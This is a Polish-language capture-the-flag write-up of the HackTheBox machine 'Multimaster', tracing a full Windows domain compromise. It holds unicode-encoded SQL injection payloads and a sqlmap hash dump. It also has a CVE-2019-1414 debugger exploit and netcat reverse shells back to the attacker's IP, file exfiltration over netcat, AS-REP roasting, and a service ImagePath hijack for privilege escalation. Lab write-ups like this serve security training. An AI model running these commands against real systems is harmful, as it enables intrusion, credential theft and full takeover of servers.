Multimaster

Nmap

nmap -sC -T5 -p- -Pn 10.10.10.179                                                
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 17:20 BST
Warning: 10.10.10.179 giving up on port because retransmission cap hit (1).
Stats: 0:03:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 92.46% done; ETC: 17:23 (0:00:15 remaining)
Nmap scan report for 10.10.10.179
Host is up, received user-set (0.12s latency).
Not shown: 65513 filtered ports
Reason: 65513 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: MegaCorp
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: MEGACORP
|   NetBIOS_Domain_Name: MEGACORP
|   NetBIOS_Computer_Name: MULTIMASTER
|   DNS_Domain_Name: MEGACORP.LOCAL
|   DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
|   DNS_Tree_Name: MEGACORP.LOCAL
|   Product_Version: 10.0.14393
|_  System_Time: 2020-05-25T16:34:34+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2020-03-08T09:52:26
|_Not valid after:  2020-09-07T09:52:26
|_ssl-date: 2020-05-25T16:34:34+00:00; +10m35s from scanner time.
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49696/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127

Host script results:
|_clock-skew: mean: 1h34m35s, deviation: 3h07m52s, median: 10m33s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: MULTIMASTER
|   NetBIOS computer name: MULTIMASTER\x00
|   Domain name: MEGACORP.LOCAL
|   Forest name: MEGACORP.LOCAL
|   FQDN: MULTIMASTER.MEGACORP.LOCAL
|_  System time: 2020-05-25T09:34:39-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-25T16:34:35
|_  start_date: 2020-05-25T05:30:07

Nmap done: 1 IP address (1 host up) scanned in 332.27 seconds

User

Na początek przeglądamy stronę internetową i możemy wyszukiwać osoby.
Robimy listę użytkowników ze zwróconego JSON’a

{"id":1,"name":"Sarina Bauer","position":"Junior Developer","email":"sbauer@megacorp.htb","src":"sbauer.jpg"},
{"id":2,"name":"Octavia Kent","position":"Senior Consultant","email":"okent@megacorp.htb","src":"okent.jpg"},
{"id":3,"name":"Christian Kane","position":"Assistant Manager","email":"ckane@megacorp.htb","src":"ckane.jpg"},
{"id":4,"name":"Kimberly Page","position":"Financial Analyst","email":"kpage@megacorp.htb","src":"kpage.jpg"},
{"id":5,"name":"Shayna Stafford","position":"HR Manager","email":"shayna@megacorp.htb","src":"shayna.jpg"},
{"id":6,"name":"James Houston","position":"QA Lead","email":"james@megacorp.htb","src":"james.jpg"},
{"id":7,"name":"Connor York","position":"Web Developer","email":"cyork@megacorp.htb","src":"cyork.jpg"},
{"id":8,"name":"Reya Martin","position":"Tech Support","email":"rmartin@megacorp.htb","src":"rmartin.jpg"},
{"id":9,"name":"Zac Curtis","position":"Junior Analyst","email":"zac@magacorp.htb","src":"zac.jpg"},
{"id":10,"name":"Jorden Mclean","position":"Full-Stack Developer","email":"jorden@megacorp.htb","src":"jorden.jpg"},
{"id":11,"name":"Alyx Walters","position":"Automation Engineer","email":"alyx@megacorp.htb","src":"alyx.jpg"},
{"id":12,"name":"Ian Lee","position":"Internal Auditor","email":"ilee@megacorp.htb","src":"ilee.jpg"},
{"id":13,"name":"Nikola Bourne","position":"Head of Accounts","email":"nbourne@megacorp.htb","src":"nbourne.jpg"},
{"id":14,"name":"Zachery Powers","position":"Credit Analyst","email":"zpowers@megacorp.htb","src":"zpowers.jpg"},
{"id":15,"name":"Alessandro Dominguez","position":"Senior Web Developer","email":"aldom@megacorp.htb","src":"aldom.jpg"},
{"id":16,"name":"MinatoTW","position":"CEO","email":"minato@megacorp.htb","src":"minato.jpg"},
{"id":17,"name":"egre55","position":"CEO","email":"egre55@megacorp.htb","src":"egre55.jpg"}

Po enumeracji wygląda na to, że jest zastosowany WAF, który przepuszcza kodowanie unicode
dlatego puszczam na to sqlmap z opcją -tamper charunicodeescape.

sqlmap -r sqlmap_req --tamper charunicodescape --dbs -delay 3
...
available databases [5]:
[*] Hub_DB
[*] master
[*] model
[*] msdb
[*] tempdb
...

w następnym kroku szukam tabel do bazy Hub_DB
w między czasie wykryło nam, że używana baza to baza mssql

sqlmap -r sqlmap_req --tamper charunicodeescape --dbms=mssql -D Hub_DB --tables -delay 3

Database: Hub_DB
[2 tables]
+------------+
| Colleagues |
| Logins     |
+------------+

na koniec wyciągamy informacje z tabeli Logins

sqlmap -r sqlmap_req --tamper charunicodeescape --dbms=mssql -D Hub_DB -T Logins -C username,password --dump -delay 3

Database: Hub_DB
Table: Logins
[17 entries]
+----------+--------------------------------------------------------------------------------------------------+
| username | password                                                                                         |
+----------+--------------------------------------------------------------------------------------------------+
| sbauer   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| okent    | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| ckane    | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| kpage    | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| shayna   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| james    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| cyork    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| rmartin  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| zac      | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| jorden   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| alyx     | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| ilee     | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| nbourne  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| zpowers  | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| aldom    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| minatotw | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc |
| egre55   | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc |
+----------+--------------------------------------------------------------------------------------------------+

jak widać jest kilka powtórek jeżeli chodzi o hashe

9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739: password1
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813: finance1
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa: banking1

Niestety okazuje się że żadne hasło nie pasuje do żadnego użytkownika
Po dłuższej chwili. Dowiaduję się że trzeba znaleźć coś takiego jak SID Domeny z SQLi

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT
SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))— -

Ale serwer korzysta z unicode’ów więc trzeba zamienić zapytanie
https://www.branah.com/unicode-converter

\u002d\u0027 \u0075\u006e\u0069\u006f\u006e \u0073\u0065\u006c\u0065\u0063\u0074 \u0031\u002c\u0032\u002c\u0033\u002c\u0034\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074 \u0028\u0073\u0065\u006c\u0065\u0063\u0074 \u0073\u0074\u0075\u0066\u0066\u0028\u0075\u0070\u0070\u0065\u0072\u0028\u0073\u0079\u0073\u002e\u0066\u006e\u005f\u0076\u0061\u0072\u0062\u0069\u006e\u0074\u006f\u0068\u0065\u0078\u0073\u0074\u0072\u0028\u0028\u0053\u0045\u004c\u0045\u0043\u0054 \u0053\u0055\u0053\u0045\u0052\u005f\u0053\u0049\u0044\u0028\u0027\u004d\u0045\u0047\u0041\u0043\u004f\u0052\u0050\u005c\u0044\u006f\u006d\u0061\u0069\u006e \u0041\u0064\u006d\u0069\u006e\u0073\u0027\u0029\u0029\u0029\u0029\u002c \u0031\u002c \u0032\u002c \u0027\u0027\u0029\u0029\u0029\u002d\u002d
[{"id":1,"name":"2","position":"3","email":"4","src":"0105000000000005150000001C00D1BCD181F1492BDFC23600020000"}]

następnie przy pomocy SID i jego modyfikacji wyciągamy z serwera userów.

MEGACORP\\james
MEGACORP\\dai
MEGACORP\\tushikikatomo
MEGACORP\\zac
MEGACORP\\lana
MEGACORP\\andrew
MEGACORP\\jorden
MEGACORP\\alyx
MEGACORP\\Privileged IT Accounts
MEGACORP\\cyork
MEGACORP\\rmartin
Services:
MEGACORP\\DnsAdmins
MEGACORP\\DnsUpdateProxy
MEGACORP\\svc-nas
MEGACORP\\svc-sql
MEGACORP\\ckane
MEGACORP\\kpage
MEGACORP\\ilee
MEGACORP\\nbourne
MEGACORP\\zpowers

następnie logujemy się i mamy usera

evil-winrm -i 10.10.10.179 -u tushikikatomo -p finance1

*Evil-WinRM* PS C:\Users\alcibiades\Desktop> cat user.txt
fa285fb87985e***cd040838271ec5

Root

*Evil-WinRM* PS C:\Users\alcibiades\Desktop> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== =============================================
megacorp\tushikikatomo S-1-5-21-3167813660-1240564177-918740779-1110


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Podobno występuje na serwerze podatność CVE-2019-1414
Poniżej linki żeby ją wykorzystać:
https://github.com/taviso/cefdebug/releases
https://iwantmore.pizza/posts/cve-2019-1414.html
https://nodejs.org/en/docs/guides/debugging-getting-started/

ściągamy pliki

$client = new-object System.Net.WebClient
$client.DownloadFile("http://10.10.14.41:80/cefdebug.exe", "C:\tmp\cefdebug.exe")
$client.DownloadFile("http://10.10.14.41:80/nc.exe", "C:\tmp\nc.exe")
*Evil-WinRM* PS C:\tmp> ./cefdebug.exe
cefdebug.exe : [2020/06/09 03:04:20:7394] U: There are 5 tcp sockets in state listen.
    + CategoryInfo          : NotSpecified: ([2020/06/09 03:...n state listen.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2020/06/09 03:04:40:7860] U: There were 3 servers that appear to be CEF debuggers.
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:51421/d04706da-b6ce-46f8-b759-ce2bf2a6b2d2
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:21809/392228b8-fb19-4565-94c9-32832b31bc58
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:25829/abc6f8dd-bac8-4a9c-9c30-44a35ee7f76e

./cefdebug.exe --url ws://127.0.0.1:51421/d04706da-b6ce-46f8-b759-ce2bf2a6b2d2 --code "process.mainModule.require('child_process').exec('cmd.exe /c C:/tmp/nc.exe 10.10.14.41 9090 -e cmd.exe')"
C:\Program Files\Microsoft VS Code>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                          
============== =============================================
megacorp\cyork S-1-5-21-3167813660-1240564177-918740779-3107


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                        Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                     


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

(na forum pisali że trzeba pogrzebać w katalogu BIN z wwwroot)
Widzimy że ten użytkownik należy do grupy Developers i mamy nim dostęp do katalogu
C:\inetpub\wwwroot\bin
w którym są pliki do serwera multimaster i przesyłamy je do siebie
MultimasterAPI.dll
MultimasterAPI.pdb

C:\tmp\nc.exe 10.10.14.41 9091 < C:\inetpub\wwwroot\bin\MultimasterAPI.dll

nc -lvp 9091 > MultimasterAPI.dll
cat MultimasterAPI.dll
...
MASTER7{ "info" : "MegaCorp API" }!application/json��server=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
...

Widzimy hasło do jakiegoś użytkownika z grupy Developers

*Evil-WinRM* PS C:\tmp> Get-ADGroupMember -Identity Developers


distinguishedName : CN=Sarina Bauer,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Sarina Bauer
objectClass       : user
objectGUID        : 548955df-e515-41c1-9afa-8130103570e2
SamAccountName    : sbauer
SID               : S-1-5-21-3167813660-1240564177-918740779-3102

distinguishedName : CN=Connor York,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Connor York
objectClass       : user
objectGUID        : 6c3c78ec-7e0a-48be-95d7-edd410457515
SamAccountName    : cyork
SID               : S-1-5-21-3167813660-1240564177-918740779-3107

distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110

distinguishedName : CN=Alessandro Dominguez,OU=London,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Alessandro Dominguez
objectClass       : user
objectGUID        : 0d1589a0-e3ae-431b-8568-b99922fdc40f
SamAccountName    : aldom
SID               : S-1-5-21-3167813660-1240564177-918740779-3115
evil-winrm.rb -i 10.10.10.179 -u sbauer -p D3veL0pM3nT!
*Evil-WinRM* PS C:\Users\sbauer\Documents> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== =============================================
megacorp\sbauer S-1-5-21-3167813660-1240564177-918740779-3102


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                         Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Dalsza enumeracja pokazuje że mamy uprawnienia do zapisu przy manipulowaniu ustawieniami użytkownika “jorden” dlatego wyciągamy od niego ticket kerberos (kerberoast)

*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
python3 /opt/impacket/examples/GetNPUsers.py MEGACORP.local/sbauer:"D3veL0pM3nT\!" -dc-ip 10.10.10.179 -request
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

Name    MemberOf                                      PasswordLastSet             LastLogon  UAC      
------  --------------------------------------------  --------------------------  ---------  --------
jorden  CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL  2020-01-10 00:48:17.503303  <never>    0x410200 



$krb5asrep$23$jorden@MEGACORP.LOCAL:8c98ac39d7e9c82ba0b70f23960fa73f$e411714c2553dd153ad32f105b76200895f9aef932d210dd0b77a78afc611b193db648750543311a859853089962035c5c4c3742059bed95198056ce1a5868a81df60417ef1a626073e1a6fe89eaf985836111b782cf0dce8d48e58e3da5872e857fda0fea38c3b7734c9878840647fb197fd65e448acba78f8a997d2f799c762c241a15169d7b11f4b7140d90967f04d43fc81d51fbac8068f1b1b3d99f2fe7fe13e5a1dd0e63855df1fa96893c1e45c983731059e08cfcd851f16f004c67fcbe80ceefbf1e3ef390da6becb100f5000a4d330277e18495a621f8aea1d775ef9e5bce70ae4d35abb098ed1f0c5a8caa
hashcat -m 18200 -D 1 -a 0 -n 10 krb_tgt /usr/share/wordlists/rockyou.txt -o jorden_pass --force

$krb5asrep$23$jorden@MEGACORP.LOCAL:8c98ac39d7e9c82ba0b70f23960fa73f$e411714c2553dd153ad32f105b76200895f9aef932d210dd0b77a78afc611b193db648750543311a859853089962035c5c4c3742059bed95198056ce1a5868a81df60417ef1a626073e1a6fe89eaf985836111b782cf0dce8d48e58e3da5872e857fda0fea38c3b7734c9878840647fb197fd65e448acba78f8a997d2f799c762c241a15169d7b11f4b7140d90967f04d43fc81d51fbac8068f1b1b3d99f2fe7fe13e5a1dd0e63855df1fa96893c1e45c983731059e08cfcd851f16f004c67fcbe80ceefbf1e3ef390da6becb100f5000a4d330277e18495a621f8aea1d775ef9e5bce70ae4d35abb098ed1f0c5a8caa:rainforest786

kolejne credentiale do użytkownika

evil-winrm.rb -i 10.10.10.179 -u jorden -p rainforest786
*Evil-WinRM* PS C:\Users\jorden\Desktop> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== =============================================
megacorp\jorden S-1-5-21-3167813660-1240564177-918740779-3110


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                        Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

po wrzuceniu WinPeas mamy info, że jest jest podatna usługa, w której możemy zmienić imagePath

REG add HKLM\System\CurrentControlSet\Services\SensorDataService /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c C:\tmp\nc.exe 10.10.14.41 9091 -e cmd.exe" /f

sc.exe start SensorDataService

i jesteśmy Admin’em

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a3f83dba0c0a***6d88323e82edef

Leave a Comment